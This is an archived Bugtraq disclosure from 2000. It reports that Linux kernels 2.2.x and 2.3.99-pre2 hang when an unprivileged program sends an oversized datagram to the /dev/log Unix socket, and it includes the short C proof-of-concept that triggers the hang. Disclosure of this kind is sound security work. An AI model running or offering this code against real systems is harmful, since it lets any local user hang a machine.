4936491 2000-03-24 10:10 /56 rader/ Postmaster
Mottagare: Bugtraq (import) <10363>
Ärende: Local Denial-of-Service attack against Linux
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID: <20000323175509.A23709@clearway.com>
Date: Thu, 23 Mar 2000 17:55:09 -0500
Reply-To: Jay Fenlason <fenlason@CLEARWAY.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Jay Fenlason <fenlason@CLEARWAY.COM>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
This amusing little program will hang Linux 2.2.12 (default Red Hat
6.1), 2.2.14 (latest stable kernel) and 2.3.99-pre2 (latest
development kernel) on my 6x86 scratch machine and our various
Pentium development machines. Note that this does not require any
special privileges.
The send system call immediately puts the kernel in a loop spewing
kmalloc: Size (131076) too large
forever (or until you hit the reset button).
Apparently unix domain sockets are ignoring the
/proc/sys/net/core/wmem_max parameter, despite the documentation to
the contrary. The fix should be simple, but I haven't had time to
chase it down, and I'm not (usually) a Linux kernel developer.
-- JF
--- BEGIN INCLUDED SOURCE FILE ---
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>
char buf[128 * 1024];
int main ( int argc, char **argv )
{
struct sockaddr SyslogAddr;
int LogFile;
int bufsize = sizeof(buf)-5;
int i;
for ( i = 0; i < bufsize; i++ )
buf[i] = ' '+(i%95);
buf[i] = '\0';
SyslogAddr.sa_family = AF_UNIX; strncpy ( SyslogAddr.sa_data,
"/dev/log", sizeof(SyslogAddr.sa_data) ); LogFile = socket (
AF_UNIX, SOCK_DGRAM, 0 ); sendto ( LogFile, buf, bufsize, 0,
&SyslogAddr, sizeof(SyslogAddr) );
return 0;
}
--- END INCLUDED SOURCE FILE ---
(4936491) ------------------------------------------(Ombruten)